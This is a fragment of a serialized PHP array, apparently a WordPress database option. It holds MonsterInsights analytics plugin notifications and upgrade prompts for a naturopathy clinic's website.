href=\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">how your site looks</a> on mobile and make sure all your content can be accessed correctly.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:2:{s:11:\"view_report\";a:2:{s:3:\"url\";s:144:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=devices&monsterinsights-highlight=devices\";s:4:\"text\";s:11:\"View Report\";}s:10:\"learn_more\";a:3:{s:3:\"url\";s:211:\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"10/20/2025 12:17 pm\";s:3:\"end\";s:10:\"11/02/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:4;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_to_add_more_file_extensions_20251022\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:28:\"Track Your Website Downloads\";s:7:\"content\";s:818:\"By default, MonsterInsights automatically tracks downloads of the following file extensions: doc, pdf, ppt, zip, xls, docx, pptx, and xlsx. You can easily add or remove extensions from that list in the <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\">Engagement settings</a> of MonsterInsights.<br><br> You can view your Top Downloads report directly in the MonsterInsights <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-download-links&monsterinsights-highlight=monsterinsights-report-download-links#/publishers\">Publishers report</a>.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:24:\"add_more_file_extensions\";a:2:{s:3:\"url\";s:233:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\";s:4:\"text\";s:19:\"Add File Extensions\";}}s:5:\"start\";s:18:\"10/22/2025 6:29 am\";s:3:\"end\";s:10:\"11/09/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:5;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_to_add_more_file_extensions_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:28:\"Track Your Website Downloads\";s:7:\"content\";s:818:\"By default, MonsterInsights automatically tracks downloads of the following file extensions: doc, pdf, ppt, zip, xls, docx, pptx, and xlsx. You can easily add or remove extensions from that list in the <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\">Engagement settings</a> of MonsterInsights.<br><br> You can view your Top Downloads report directly in the MonsterInsights <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-download-links&monsterinsights-highlight=monsterinsights-report-download-links#/publishers\">Publishers report</a>.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:24:\"add_more_file_extensions\";a:2:{s:3:\"url\";s:233:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\";s:4:\"text\";s:19:\"Add File Extensions\";}}s:5:\"start\";s:19:\"04/01/2025 11:58 am\";s:3:\"end\";s:10:\"04/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:6;a:10:{s:2:\"id\";s:56:\"monsterinsights_notification_returning_visitors_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:44:\"Only 0% of Your Visitors Return to Your Site\";s:7:\"content\";s:329:\"Your site has received a low number of returning users over the past 30 days. Try a tool like <a href=\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">OptinMonster</a> to increase engagement.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:168:\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:03 am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:7;a:10:{s:2:\"id\";s:51:\"monsterinsights_notification_mobile_device_20220630\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Traffic From Mobile Devices 0%\";s:7:\"content\";s:525:\"Traffic from mobile devices is considerably lower on your site compared to desktop devices. This could be an indicator that your site is not optimised for mobile devices.<br><br>Take a look now at <a href=\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">how your site looks</a> on mobile and make sure all your content can be accessed correctly.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:2:{s:11:\"view_report\";a:2:{s:3:\"url\";s:144:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=devices&monsterinsights-highlight=devices\";s:4:\"text\";s:11:\"View Report\";}s:10:\"learn_more\";a:3:{s:3:\"url\";s:210:\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"06/30/2022 12:33 am\";s:3:\"end\";s:10:\"07/13/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:8;a:10:{s:2:\"id\";s:51:\"monsterinsights_notification_mobile_device_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Traffic From Mobile Devices 0%\";s:7:\"content\";s:525:\"Traffic from mobile devices is considerably lower on your site compared to desktop devices. This could be an indicator that your site is not optimised for mobile devices.<br><br>Take a look now at <a href=\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">how your site looks</a> on mobile and make sure all your content can be accessed correctly.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:2:{s:11:\"view_report\";a:2:{s:3:\"url\";s:144:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=devices&monsterinsights-highlight=devices\";s:4:\"text\";s:11:\"View Report\";}s:10:\"learn_more\";a:3:{s:3:\"url\";s:210:\"https://www.wpbeginner.com/beginners-guide/how-to-preview-the-mobile-layout-of-your-site/?utm_source=monsterinsights&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 4:45 am\";s:3:\"end\";s:10:\"11/03/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:9;a:10:{s:2:\"id\";s:56:\"monsterinsights_notification_returning_visitors_20250401\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:44:\"Only 0% of Your Visitors Return to Your Site\";s:7:\"content\";s:330:\"Your site has received a low number of returning users over the past 30 days. Try a tool like <a href=\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">OptinMonster</a> to increase engagement.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:169:\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:54 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:10;a:10:{s:2:\"id\";s:56:\"monsterinsights_notification_returning_visitors_20251022\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:44:\"Only 0% of Your Visitors Return to Your Site\";s:7:\"content\";s:330:\"Your site has received a low number of returning users over the past 30 days. Try a tool like <a href=\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">OptinMonster</a> to increase engagement.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:10:\"learn_more\";a:3:{s:3:\"url\";s:169:\"https://www.monsterinsights.com/optinmonster-review/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:10:\"Learn More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 2:14 am\";s:3:\"end\";s:10:\"11/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:11;a:10:{s:2:\"id\";s:53:\"monsterinsights_notification_install_wpforms_20221021\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:37:\"Create a Contact Form in Only Minutes\";s:7:\"content\";s:64:\"Install WPForms and create contact forms in a matter of minutes.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:0:{}s:5:\"start\";s:18:\"10/21/2022 5:14 am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:12;a:10:{s:2:\"id\";s:53:\"monsterinsights_notification_install_wpforms_20250401\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:37:\"Create a Contact Form in Only Minutes\";s:7:\"content\";s:64:\"Install WPForms and create contact forms in a matter of minutes.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:0:{}s:5:\"start\";s:19:\"04/01/2025 11:59 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:13;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20251020\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:18:\"10/20/2025 6:17 am\";s:3:\"end\";s:10:\"11/17/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:14;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20221021\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:18:\"10/21/2022 4:45 am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:15;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20220630\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:19:\"06/30/2022 12:32 am\";s:3:\"end\";s:10:\"07/28/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:16;a:10:{s:2:\"id\";s:62:\"monsterinsights_notification_to_setup_affiliate_links_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Set Up Affiliate Link Tracking\";s:7:\"content\";s:556:\"By tracking your affiliate links in Google Analytics, you can gather all the data you need to optimize your links for maximizing affiliate revenue. You can track affiliate link clicks on your website with little configuration needed.<br><br><a href=\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">In this article</a>, we’ll show you how to set up affiliate link tracking in WordPress.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:9:\"read_more\";a:3:{s:3:\"url\";s:199:\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:9:\"Read More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:11 am\";s:3:\"end\";s:10:\"11/13/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:17;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20230530\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:18:\"05/30/2023 1:25 am\";s:3:\"end\";s:10:\"06/27/2023\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:18;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20250401\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:19:\"04/01/2025 11:52 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:19;a:10:{s:2:\"id\";s:62:\"monsterinsights_notification_to_setup_affiliate_links_20251022\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:30:\"Set Up Affiliate Link Tracking\";s:7:\"content\";s:557:\"By tracking your affiliate links in Google Analytics, you can gather all the data you need to optimize your links for maximizing affiliate revenue. You can track affiliate link clicks on your website with little configuration needed.<br><br><a href=\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">In this article</a>, we’ll show you how to set up affiliate link tracking in WordPress.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:9:\"read_more\";a:3:{s:3:\"url\";s:200:\"https://www.monsterinsights.com/how-to-set-up-affiliate-link-tracking-in-wordpress/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:9:\"Read More\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:29 am\";s:3:\"end\";s:10:\"11/14/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:20;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_to_add_more_file_extensions_20221021\";s:4:\"icon\";s:7:\"default\";s:5:\"title\";s:28:\"Track Your Website Downloads\";s:7:\"content\";s:818:\"By default, MonsterInsights automatically tracks downloads of the following file extensions: doc, pdf, ppt, zip, xls, docx, pptx, and xlsx. You can easily add or remove extensions from that list in the <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\">Engagement settings</a> of MonsterInsights.<br><br> You can view your Top Downloads report directly in the MonsterInsights <a href=\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-download-links&monsterinsights-highlight=monsterinsights-report-download-links#/publishers\">Publishers report</a>.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:24:\"add_more_file_extensions\";a:2:{s:3:\"url\";s:233:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_settings&monsterinsights-scroll=monsterinsights-settings-block-file-downloads&monsterinsights-highlight=monsterinsights-settings-block-file-downloads#/engagement\";s:4:\"text\";s:19:\"Add File Extensions\";}}s:5:\"start\";s:18:\"10/21/2022 5:11 am\";s:3:\"end\";s:10:\"11/08/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:21;a:10:{s:2:\"id\";s:46:\"monsterinsights_notification_visitors_20250531\";s:4:\"icon\";s:9:\"lightning\";s:5:\"title\";s:35:\"See how 0 Visitors Found Your Site!\";s:7:\"content\";s:122:\"Your website has been visited by 0 visitors in the past 30 days. Click the button below to view the full analytics report.\";s:4:\"type\";a:5:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:6:\"master\";i:3;s:4:\"plus\";i:4;s:3:\"pro\";}s:4:\"btns\";a:1:{s:11:\"view_report\";a:2:{s:3:\"url\";s:192:\"https://verdenaturopathy.com.au/wp-admin/admin.php?page=monsterinsights_reports&monsterinsights-scroll=monsterinsights-report-overview&monsterinsights-highlight=monsterinsights-report-overview\";s:4:\"text\";s:11:\"View Report\";}}s:5:\"start\";s:18:\"05/31/2025 3:40 am\";s:3:\"end\";s:10:\"06/28/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:2;}i:22;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_google_optimize_20251022\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:21:\"A/B Test Your Website\";s:7:\"content\";s:773:\"<a href=\"https://www.monsterinsights.com/addon/google-optimize/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Google Optimize</a> is a free A/B testing and personalization product by Google that lets you easily conduct experiments to see what content, images, and layouts work best on your site. With Google Optimize, you can use split testing and personalization to create online experiences that engage and delight your customers. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to unlock the Google Optimize addon.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:29 am\";s:3:\"end\";s:10:\"11/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:23;a:10:{s:2:\"id\";s:67:\"monsterinsights_notification_upgrade_for_custom_dimensions_20221021\";s:4:\"icon\";s:4:\"star\";s:5:\"title\";s:30:\"Upgrade to MonsterInsights Pro\";s:7:\"content\";s:177:\"Upgrade to enable Custom Dimensions. Track logged in users, determine when is your best time to post, measure if your SEO strategy is working, and find your most popular author.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:05 am\";s:3:\"end\";s:10:\"11/08/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:24;a:10:{s:2:\"id\";s:71:\"monsterinsights_notification_upgrade_for_search_console_report_20251022\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:27:\"See Top Performing Keywords\";s:7:\"content\";s:309:\"<a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to see which keywords are driving traffic to your website so you can focus on what\'s working.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:11:\"Upgrade Now\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/22/2025 6:14 am\";s:3:\"end\";s:10:\"11/19/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:25;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_email_summaries_20250401\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:24:\"Get Weekly Email Reports\";s:7:\"content\";s:616:\"Wouldn’t it be easy if you could get your website’s performance report in your email inbox every week? With Email Summaries, you can view all your important stats in a simple report that’s delivered straight to your inbox. <br><br>You get an overview of your site\'s performance without logging in to WordPress or going through different analytics reports. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to enable the Email Summaries feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:154:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.10.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:19:\"04/01/2025 11:57 am\";s:3:\"end\";s:10:\"04/29/2025\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:26;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_google_optimize_20221021\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:21:\"A/B Test Your Website\";s:7:\"content\";s:771:\"<a href=\"https://www.monsterinsights.com/addon/google-optimize/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">Google Optimize</a> is a free A/B testing and personalization product by Google that lets you easily conduct experiments to see what content, images, and layouts work best on your site. With Google Optimize, you can use split testing and personalization to create online experiences that engage and delight your customers. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to unlock the Google Optimize addon.\";s:4:\"type\";a:3:{i:0;s:5:\"basic\";i:1;s:4:\"lite\";i:2;s:4:\"plus\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:06 am\";s:3:\"end\";s:10:\"11/18/2022\";s:8:\"category\";s:7:\"insight\";s:8:\"priority\";i:3;}i:27;a:10:{s:2:\"id\";s:65:\"monsterinsights_notification_upgrade_for_email_summaries_20221021\";s:4:\"icon\";s:7:\"warning\";s:5:\"title\";s:24:\"Get Weekly Email Reports\";s:7:\"content\";s:615:\"Wouldn’t it be easy if you could get your website’s performance report in your email inbox every week? With Email Summaries, you can view all your important stats in a simple report that’s delivered straight to your inbox. <br><br>You get an overview of your site\'s performance without logging in to WordPress or going through different analytics reports. <a href=\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\" target=\"_blank\">Upgrade to MonsterInsights Pro</a> to enable the Email Summaries feature.\";s:4:\"type\";a:1:{i:0;s:4:\"lite\";}s:4:\"btns\";a:1:{s:23:\"get_monsterinsights_pro\";a:3:{s:3:\"url\";s:153:\"https://www.monsterinsights.com/lite/?utm_source=liteplugin&utm_medium=monsterinsights-notifications-sidebar&utm_campaign=notifications&utm_content=8.5.0\";s:4:\"text\";s:23:\"Get MonsterInsights Pro\";s:11:\"is_external\";b:1;}}s:5:\"start\";s:18:\"10/21/2022 5:05 